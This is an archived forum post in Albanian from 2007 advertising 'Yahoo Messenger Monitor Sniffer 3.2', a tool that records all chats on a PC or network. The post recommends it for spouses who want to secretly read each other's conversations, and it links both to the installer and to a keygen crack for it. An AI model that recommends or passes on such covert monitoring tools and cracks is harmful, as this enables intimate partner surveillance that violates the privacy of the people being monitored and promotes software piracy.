PDA

View Full Version : Yahoo Messenger Monitor Sniffer 3.2


Zero Cool
28-05-07, 13:15
Yahoo Messenger Monitor Sniffer 3.2 ( shih MSN Messenger Monitor Sniffer 3.0).
Pra ėshtė njė program me tė cilin mund tė regjistrohen te gjitha bisedimet(shkrimet) ne njė PC apo njė network (tė gjitha PC-te) dhe i ruan si html dokument, dhe pastaj te analizohen.
Ideal pėr tė martuarit, tė cilėt nuk i besojnė njėri tjetrit, qė tė kontrollojnė bashkėshortin (me kend po shkruan dhe qka po shkruan).

Shkarko :

http://www.immonitor.com/download/yahoomonitor.exe (http://www.immonitor.com/download/yahoomonitor.exe)

Addon(Crack):

http://www.crackserver.com/v/cs0dyyahoo.messenger.monitor.sniffer.v3.2.keygen.i cu.zip_x1_.htm (http://www.crackserver.com/v/cs0dyyahoo.messenger.monitor.sniffer.v3.2.keygen.i cu.zip_x1_.htm)Enjoy, ZC